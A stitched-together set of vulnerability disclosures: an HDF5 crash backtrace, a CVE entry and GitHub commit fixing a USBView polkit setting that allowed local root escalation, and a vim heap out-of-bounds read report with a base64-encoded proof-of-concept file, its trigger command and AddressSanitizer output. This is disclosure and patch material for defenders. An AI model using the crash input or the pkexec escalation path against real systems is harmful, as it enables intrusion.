        at /home/zxq/CVE_testing/source/hdf5/src/H5Dint.c:1447
    #8  0x00005555557a09e2 in H5VL__native_dataset_open (obj=<optimized out>, loc_params=<optimized out>, name=0x55555594e230 "/BAG_root/tracking_list", dapl_id=0xb00000000000007, dxpl_id=<optimized out>, 
        req=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLnative_dataset.c:251
    #9  0x000055555578c488 in H5VL__dataset_open (cls=<optimized out>, req=0x0, dxpl_id=0xb00000000000008, dapl_id=0xb00000000000007, name=0x55555594e230 "/BAG_root/tracking_list", loc_params=0x7fffffffd630, 
        obj=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:1944
    #10 H5VL_dataset_open (vol_obj=0x555555944740, loc_params=loc_params@entry=0x7fffffffd630, name=name@entry=0x55555594e230 "/BAG_root/tracking_list", dapl_id=0xb00000000000007, dxpl_id=0xb00000000000008, 
        req=req@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:1976
    #11 0x00005555555bb5e2 in H5D__open_api_common (_vol_obj_ptr=0x0, token_ptr=0x0, dapl_id=<optimized out>, name=0x55555594e230 "/BAG_root/tracking_list", loc_id=0x100000000000000)
        at /home/zxq/CVE_testing/source/hdf5/src/H5D.c:356
    #12 H5Dopen2 (loc_id=0x100000000000000, name=0x55555594e230 "/BAG_root/tracking_list", dapl_id=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5D.c:396
    #13 0x0000555555563784 in convert (fid=<optimized out>, dname=0x55555594e230 "/BAG_root/tracking_list") at /home/zxq/CVE_testing/source/hdf5/tools/src/h5format_convert/h5format_convert.c:213
    #14 0x0000555555563d88 in convert_dsets_cb (path=0x55555594e230 "/BAG_root/tracking_list", oi=<optimized out>, already_visited=<optimized out>, _fid=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/tools/src/h5format_convert/h5format_convert.c:363
    #15 0x000055555557c8ca in traverse_cb (loc_id=<optimized out>, path=<optimized out>, linfo=<optimized out>, _udata=0x7fffffffe150) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:218
    #16 0x00005555556296a6 in H5G__visit_cb (lnk=0x7fffffffd8f0, _udata=0x7fffffffdf40) at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1016
    #17 0x000055555563036e in H5G__node_iterate (f=f@entry=0x555555941400, _lt_key=<optimized out>, addr=0x8a0, _rt_key=<optimized out>, _udata=_udata@entry=0x7fffffffda30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gnode.c:967
    #18 0x00005555557cfe40 in H5B__iterate_helper (f=0x555555941400, type=0x5555558f3f20 <H5B_SNODE>, addr=0x348, op=0x555555630280 <H5G__node_iterate>, udata=udata@entry=0x7fffffffda30)
        at /home/zxq/CVE_testing/source/hdf5/src/H5B.c:1152
    #19 0x00005555557d131b in H5B_iterate (f=<optimized out>, type=<optimized out>, addr=<optimized out>, op=<optimized out>, udata=udata@entry=0x7fffffffda30) at /home/zxq/CVE_testing/source/hdf5/src/H5B.c:1194
    #20 0x0000555555635146 in H5G__stab_iterate (oloc=oloc@entry=0x7fffffffdbb0, order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=op@entry=0x5555556295f0 <H5G__visit_cb>, 
        op_data=0x7fffffffdf40) at /home/zxq/CVE_testing/source/hdf5/src/H5Gstab.c:536
    #21 0x0000555555632cc5 in H5G__obj_iterate (grp_oloc=grp_oloc@entry=0x7fffffffdbb0, idx_type=H5_INDEX_NAME, order=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, 
        op=op@entry=0x5555556295f0 <H5G__visit_cb>, op_data=0x7fffffffdf40) at /home/zxq/CVE_testing/source/hdf5/src/H5Gobj.c:672
    #22 0x00005555556299e6 in H5G__visit_cb (lnk=<optimized out>, _udata=0x7fffffffdf40) at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1101
    #23 0x000055555563036e in H5G__node_iterate (f=f@entry=0x555555941400, _lt_key=<optimized out>, addr=0x5e0, _rt_key=<optimized out>, _udata=_udata@entry=0x7fffffffddc0)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gnode.c:967
    #24 0x00005555557cfe40 in H5B__iterate_helper (f=0x555555941400, type=0x5555558f3f20 <H5B_SNODE>, addr=0x88, op=0x555555630280 <H5G__node_iterate>, udata=udata@entry=0x7fffffffddc0)
        at /home/zxq/CVE_testing/source/hdf5/src/H5B.c:1152
    #25 0x00005555557d131b in H5B_iterate (f=<optimized out>, type=<optimized out>, addr=<optimized out>, op=<optimized out>, udata=udata@entry=0x7fffffffddc0) at /home/zxq/CVE_testing/source/hdf5/src/H5B.c:1194
    #26 0x0000555555635146 in H5G__stab_iterate (oloc=oloc@entry=0x555555944ac8, order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, op=op@entry=0x5555556295f0 <H5G__visit_cb>, 
        op_data=0x7fffffffdf40) at /home/zxq/CVE_testing/source/hdf5/src/H5Gstab.c:536
    #27 0x0000555555632cc5 in H5G__obj_iterate (grp_oloc=grp_oloc@entry=0x555555944ac8, idx_type=H5_INDEX_NAME, order=order@entry=H5_ITER_INC, skip=skip@entry=0x0, last_lnk=last_lnk@entry=0x0, 
        op=op@entry=0x5555556295f0 <H5G__visit_cb>, op_data=0x7fffffffdf40) at /home/zxq/CVE_testing/source/hdf5/src/H5Gobj.c:672
    #28 0x000055555562b044 in H5G_visit (loc=loc@entry=0x7fffffffdfd0, group_name=<optimized out>, idx_type=<optimized out>, order=H5_ITER_INC, op=<optimized out>, op_data=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5Gint.c:1243
    #29 0x00005555557a53b5 in H5VL__native_link_specific (obj=<optimized out>, loc_params=0x7fffffffe050, args=0x7fffffffe080, dxpl_id=<optimized out>, req=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5VLnative_link.c:374
    #30 0x00005555557943c0 in H5VL__link_specific (cls=<optimized out>, req=0x0, dxpl_id=0xb00000000000008, args=0x7fffffffe080, loc_params=0x7fffffffe050, obj=<optimized out>)
        at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5305
    #31 H5VL_link_specific (vol_obj=vol_obj@entry=0x555555944740, loc_params=loc_params@entry=0x7fffffffe050, args=args@entry=0x7fffffffe080, dxpl_id=0xb00000000000008, req=req@entry=0x0)
        at /home/zxq/CVE_testing/source/hdf5/src/H5VLcallback.c:5339
    #32 0x000055555565f021 in H5Lvisit_by_name2 (loc_id=loc_id@entry=0x100000000000000, group_name=group_name@entry=0x555555810903 "/", idx_type=H5_INDEX_NAME, order=H5_ITER_INC, 
        op=op@entry=0x55555557c710 <traverse_cb>, op_data=op_data@entry=0x7fffffffe150, lapl_id=<optimized out>) at /home/zxq/CVE_testing/source/hdf5/src/H5L.c:1984
    #33 0x000055555557dd7e in traverse (fields=0x1, visitor=0x7fffffffe110, recurse=0x1, visit_start=<optimized out>, grp_name=0x555555810903 "/", file_id=0x100000000000000)
        at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:288
    #34 h5trav_visit (fid=0x100000000000000, grp_name=0x555555810903 "/", visit_start=<optimized out>, recurse=<optimized out>, visit_obj=<optimized out>, visit_lnk=<optimized out>, udata=0x7fffffffe220, 
        fields=0x1) at /home/zxq/CVE_testing/source/hdf5/tools/lib/h5trav.c:1057
    #35 0x000055555556324d in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe338) at /home/zxq/CVE_testing/source/hdf5/tools/src/h5format_convert/h5format_convert.c:426
    #36 0x00007ffff7c910b3 in __libc_start_main (main=0x555555562f20 <main>, argc=0x2, argv=0x7fffffffe338, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe328)
        at ../csu/libc-start.c:308
    #37 0x00005555555633ee in _start () at /home/zxq/CVE_testing/source/hdf5/tools/src/h5format_convert/h5format_convert.c:166

CVE-2021-46244: Divide By Zero in H5T__complete_copy () at /hdf5/src/H5T.c:3613 · Issue #1327 · HDFGroup/hdf5

USBView 2.1 before 2.2 allows some local users (e.g., ones logged in via SSH) to execute arbitrary code as root because certain Polkit settings (e.g., allow_any=yes) for pkexec disable the authentication requirement. Code execution can, for example, use the --gtk-module option. This affects Ubuntu, Debian, and Gentoo.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

gregkh / **usbview** Public

*   Notifications
*   Fork 57
*   Star 204
    

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

org.freedesktop.pkexec.usbview.policy: fix a local root privilege esc…

…alation issue via pkexec (CVE-2022-23220).

The polkit policy allowed unprivileged users to run usbview as root with
arbitrary command line arguments, allowing a local root exploit.

Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

*   Loading branch information

gregkh committed

Jan 21, 2022

1 parent 4a5de69 commit bf374fa

Showing **1 changed file** with **2 additions** and **2 deletions**.

4 changes: 2 additions & 2 deletions org.freedesktop.pkexec.usbview.policy

Show comments View file

Expand Up

@@ -8,8 +8,8 @@

<message\>Authentication is required to view USB bus</message\>

<icon\_name\>usbview\_icon</icon\_name\>

<defaults\>

<allow\_any\>yes</allow\_any\>

<allow\_inactive\>yes</allow\_inactive\>

<allow\_any\>no</allow\_any\>

<allow\_inactive\>no</allow\_inactive\>

<allow\_active\>auth\_admin\_keep</allow\_active\>

</defaults\>

<annotate key\="org.freedesktop.policykit.exec.path"\>/usr/bin/usbview</annotate\>

Expand Down

**0 comments on commit bf374fa**

Please sign in to comment.

CVE-2022-23220: org.freedesktop.pkexec.usbview.policy: fix a local root privilege esc… · gregkh/usbview@bf374fa

Permalink

Browse files

org.freedesktop.pkexec.usbview.policy: fix a local root privilege esc…

…alation issue via pkexec (CVE-2022-23220).

The polkit policy allowed unprivileged users to run usbview as root with
arbitrary command line arguments, allowing a local root exploit.

Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

*   Loading branch information

![@gregkh](https://avatars.githubusercontent.com/u/14953?s=40&v=4)

1 parent 4a5de69 commit bf374fa4e5b9a756789dfd88efa93806a395463b

Showing with **2 additions** and **2 deletions**.

1.  +2 −2 org.freedesktop.pkexec.usbview.policy

@@ -8,8 +8,8 @@

<message\>Authentication is required to view USB bus</message\>

<icon\_name\>usbview\_icon</icon\_name\>

<defaults\>

<allow\_any\>yes</allow\_any\>

<allow\_inactive\>yes</allow\_inactive\>

<allow\_any\>no</allow\_any\>

<allow\_inactive\>no</allow\_inactive\>

<allow\_active\>auth\_admin\_keep</allow\_active\>

</defaults\>

<annotate key\="org.freedesktop.policykit.exec.path"\>/usr/bin/usbview</annotate\>

**0 comments on commit `bf374fa`**

Please sign in to comment.

Out-of-bounds Read in vim/vim prior to 8.2.

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regardless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build (lastest commit hash fd218c8a36e7ed33f7a205163690c5b7d2f31f8a) on Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept**

Here is the smallest poc we were able to produce (it is base64 encoded since it contains some unprintable characters):

    $ echo -ne "CXdpMDAwMDAwMDA1MDAwMCA1MDAwMDAwMDAwMDAACiAgc2lsIW5vcm0ICAgICAgICBYXDrJPKgNn
    eW9leHQgFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRsa25lCiAgc2lsIW5vcm0ICAgI9/f3
    MBYXGLJPKgNneXl5k/95eQEBAgEN/gb/3jABPQGEAQEBAT15eXl5eW1lpmUgZSsgeXlweXl5AXV1
    dXV1dXV1enUwdXV1dnV1" | base64 -d > poc
    $ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
    =================================================================
    ==67807==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000016500 at pc 0x7f4e10795f40 bp 0x7fffa0da2520 sp 0x7fffa0da1cc8
    READ of size 4 at 0x621000016500 thread T0
        #0 0x7f4e10795f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
        #1 0x5612382d840a in vim_memsave /home/faraday/vim/src/alloc.c:604
        #2 0x561238d26031 in u_save_line /home/faraday/vim/src/undo.c:373
        #3 0x561238d4665c in u_saveline /home/faraday/vim/src/undo.c:3477
        #4 0x561238d25615 in u_save /home/faraday/vim/src/undo.c:257
        #5 0x561238d254a4 in u_save_cursor /home/faraday/vim/src/undo.c:237
        #6 0x5612388b83c5 in op_addsub /home/faraday/vim/src/ops.c:2386
        #7 0x561238858e66 in nv_addsub /home/faraday/vim/src/normal.c:2302
        #8 0x56123884f61f in normal_cmd /home/faraday/vim/src/normal.c:1120
        #9 0x5612385ac525 in exec_normal /home/faraday/vim/src/ex_docmd.c:8638
        #10 0x5612385ac2e4 in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8601
        #11 0x5612385ab802 in ex_normal /home/faraday/vim/src/ex_docmd.c:8519
        #12 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
        #13 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
        #14 0x561238addf98 in do_source /home/faraday/vim/src/scriptfile.c:1512
        #15 0x561238adaf75 in cmd_source /home/faraday/vim/src/scriptfile.c:1098
        #16 0x561238adb132 in ex_source /home/faraday/vim/src/scriptfile.c:1124
        #17 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
        #18 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
        #19 0x56123855f288 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
        #20 0x56123905a82d in exe_commands /home/faraday/vim/src/main.c:3091
        #21 0x56123904c323 in vim_main2 /home/faraday/vim/src/main.c:774
        #22 0x56123904b809 in main /home/faraday/vim/src/main.c:426
        #23 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #24 0x5612382d7cbd in _start (/home/faraday/vim/src/vim+0x1259cbd)
    
    0x621000016500 is located 0 bytes to the right of 4096-byte region [0x621000015500,0x621000016500)
    allocated by thread T0 here:
        #0 0x7f4e10802bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x5612382d817e in lalloc /home/faraday/vim/src/alloc.c:248
        #2 0x5612382d7f29 in alloc /home/faraday/vim/src/alloc.c:151
        #3 0x561239062c5c in mf_alloc_bhdr /home/faraday/vim/src/memfile.c:884
        #4 0x56123905f03c in mf_new /home/faraday/vim/src/memfile.c:376
        #5 0x5612387bbbda in ml_new_data /home/faraday/vim/src/memline.c:4077
        #6 0x561238798cc5 in ml_open /home/faraday/vim/src/memline.c:394
        #7 0x561238304457 in open_buffer /home/faraday/vim/src/buffer.c:185
        #8 0x561239059185 in create_windows /home/faraday/vim/src/main.c:2861
        #9 0x56123904c02e in vim_main2 /home/faraday/vim/src/main.c:705
        #10 0x56123904b809 in main /home/faraday/vim/src/main.c:426
        #11 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
    Shadow bytes around the buggy address:
      0x0c427fffac50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fffaca0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427ffface0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==67807==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

Tag

#ubuntu